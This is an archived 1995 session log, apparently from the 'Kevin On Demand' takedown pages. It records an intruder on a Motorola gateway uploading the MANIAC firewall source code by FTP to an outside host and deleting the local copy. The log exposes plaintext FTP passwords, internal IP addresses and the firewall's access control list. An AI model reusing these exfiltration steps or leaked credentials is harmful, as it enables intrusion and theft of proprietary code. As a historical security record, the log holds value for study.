Kevin On Demand
- He Just Stole MANIAC - kevin-on-demand.takedown.com 4014
- Start: 1995 Feb 10 23:26:50
- Total Run Time: 17:32
- From NETCOM-rtp1.netcom.net to netcom15.netcom.com.
- Kevin breaks into Motorola, and steals, with a fair bit of thrashing, the source code to Motorola's firewall product, MANIAC (Motorola Authenticated Internet Access). This is the call that GTE failed to trace.
Other MANIAC files
DOC/: This directory contains all of the MANIAC documents and template routing, access control, and DNS files.
External/: This directory conatins all the executables and system files necessary to install MANIAC on the external firewall.
LEGAL: This is the legal notice about MANIACTM.
LOG: This file contains a log of all the enhancements, bugs, and fixes made to MANIAC, along with the date.
Make.def: This file is used to set the global definitions within MANIAC.
Makefile: This is the top level make file for MANIAC.
VERSION: This file indicates the version level of the MANIAC code.
spsgate# telnet csn.org 3111
csn.org: unknown host
telnet> open 128.138.213.20 3111
telnet: connect: Connection refused
telnet> open 128.138.213.21.
128.138.213.21.: unknown host
telnet> open 128.138.213.21 3111
Trying 128.138.213.21 ...
Connected to 128.138.213.21.
Escape character is '^]'.
nm
nnm^U
^]
test1> quirt
?Invalid command
test1> quit
Connection closed.
$ /usr/etc/nslookup
Default Server: netcom15.NETCOM.COM
Address: 192.100.81.128
> escape.com
Server: netcom15.NETCOM.COM
Address: 192.100.81.128
Non-authoritative answer:
Name: escape.com
Address: 198.6.71.10
> ^D
$ et
et: not found
$ ts
ts: not found
$ test1
test1> open spsgate.sps.mot.com
Trying 192.70.231.1 ...
Connected to spsgate.sps.mot.com.
Escape character is '^]'.
^]
test1> quit
Connection closed.
$ test1
test1> open 192.70.231.1 3111
Trying 192.70.231.1 ...
Connected to 192.70.231.1.
Escape character is '^]'.
nm
SunOS UNIX (spsgate)
spsgate# cd /local
spsgate# ftp
ftp> open 198.6.71.10
Connected to 198.6.71.10.
220 escape.com FTP server (SunOS 4.1) ready.
Name (198.6.71.10:root): marty
331 Password required for marty.
Password: oki,900
230 User marty logged in.
ftp> bin
200 Type set to I.
ftp> mput man*
mput maniac? n
mput maniac1.3.4.tar.Z? y
200 PORT command successful.
150 Binary data connection for maniac1.3.4.tar.Z (192.70.231.1,2859).
netout: Broken pipe
421 Service not available, remote server has closed connection
local: maniac1.3.4.tar.Z remote: maniac1.3.4.tar.Z
1351680 bytes sent in 2.7e+02 seconds (4.8 Kbytes/s)
ftp> open 198.6.71.10
Connected to 198.6.71.10.
220 escape.com FTP server (SunOS 4.1) ready.
Name (198.6.71.10:root): jsz
331 Password required for jsz.
Password: j00bad
230 User jsz logged in.
ftp> cd marty
250 CWD command successful.
ftp> bin
200 Type set to I.
ftp> mput man*
mput maniac? n
mput maniac1.3.4.tar.Z? y
200 PORT command successful.
150 Binary data connection for maniac1.3.4.tar.Z (192.70.231.1,2895).
nary Transfer complete.
local: maniac1.3.4.tar.Z remote: maniac1.3.4.tar.Z
1845983 bytes sent in 3e+02 seconds (6.1 Kbytes/s)
ftp> quit
221 Goodbye.
spsgate# rm *.tar.Z
spsgate# ls
backup lib maniac newsbin vin
bin lost+found news var wied
spsgate# ls vin
.cshrc
spsgate# ls wied
.cshrc .rnsoft interman out rn
.login 1m lib passwd typescript
.newsrc a.c netman pwrx_tarfile wscrawl
.oldnewsrc bin.sun4X nslookup readme xmelt
spsgate# ls -tlas wied
total 4383
1 drwxr-xr-x 12 root 512 Feb 11 00:43 ..
1 drwxr-xr-x 5 wied 512 Feb 9 15:43 .
66 -rw-r--r-- 1 root 67346 Jan 25 09:16 out
1 -rw-r----- 1 wied 45 Jan 23 10:00 readme
1032 -rw------T 1 root 1048576 Jan 12 14:39 1m
264 -rwxr-x--x 1 wied 262144 Sep 9 15:42 interman
1 drwxr-xr-x 5 106 512 Sep 9 14:37 netman
80 -rw-r----- 1 wied 81920 Feb 15 1994 nslookup
1 -rw-r--r-- 1 wied 267 Feb 4 1994 typescript
0 -rw-r--r-- 1 root 0 Nov 11 1993 .cshrc
0 -rw-r--r-- 1 root 0 Nov 11 1993 passwd
2 -rw-r----- 1 wied 1511 Oct 20 1993 a.c
24 -rwxr-x--x 1 wied 24576 Oct 20 1993 xmelt
1 drwxr-xr-x 2 13614 512 Oct 19 1993 bin.sun4X
1760 -rwxr-x--x 1 wied 1794048 Jun 4 1993 wscrawl
928 -rwxr-x--x 1 wied 942080 Apr 28 1993 pwrx_tarfile
1 drwxr-xr-x 2 13614 512 Mar 23 1993 lib
1 -rw-r--r-- 1 wied 673 Feb 19 1993 .newsrc
1 -rw-r--r-- 1 root 178 Feb 11 1993 .rnsoft
1 -rw-r--r-- 1 root 29 Feb 11 1993 .login
1 -rw-r--r-- 1 root 541 Feb 11 1993 .oldnewsrc
216 -rwxr-x--x 1 wied 212992 Feb 11 1993 rn
spsgate# cd maniac
spsgate# ls -tla | head
total 4498
drwxr-xr-x 12 root 512 Feb 11 00:43 ..
-rwxr-x--x 1 wied 315 Feb 9 15:56 routes
drwxr-xr-x 13 106 1536 Feb 9 15:54 MANIAC1.3.4
drwxr-xr-x 5 root 512 Feb 9 15:44 .
-rw-r----- 1 wied 4227072 Feb 9 15:43 maniac1.3.4.tar
-rwxr-x--x 1 wied 913 Feb 9 10:56 access
drwxr-xr-x 2 root 512 Oct 18 10:12 spool
-rwxr-x--x 1 root 73728 Jul 8 1994 in.telnetbd
-rwxrwxr-x 1 root 106496 May 13 1994 in.ftpd
spsgate# cat access
#
# Access Control List for MANIAC - Motorola Authenicated Internet Access.
#
# EXTERNAL FIREWALL ACCESS CONTROL LIST
#
# Let only internal firewall have access to Internet machines.
access-list 1 deny 192.5.251.200 0.0.0.0 0.0.0.0 255.255.255.255 tcp/70
access-list 1 deny 192.5.251.200 0.0.0.0 0.0.0.0 255.255.255.255 tcp/80
access-list 1 deny 192.5.251.200 0.0.0.0 0.0.0.0 255.255.255.255 tcp/151
access-list 1 deny 192.5.251.200 0.0.0.0 0.0.0.0 255.255.255.255 tcp/210
access-list 1 permit 192.5.251.200 0.0.0.0 0.0.0.0 255.255.255.255 tcp/all
access-list 1 permit 192.111.232.1 0.0.0.0 0.0.0.0 255.255.255.255 tcp/all
access-list 1 permit 192.5.251.101 0.0.0.0 0.0.0.0 255.255.255.255 tcp/all
#*****************************************************************************
# DO NOT MODIFY ANYTHING ABOVE THIS LINE
#*****************************************************************************
spsgate#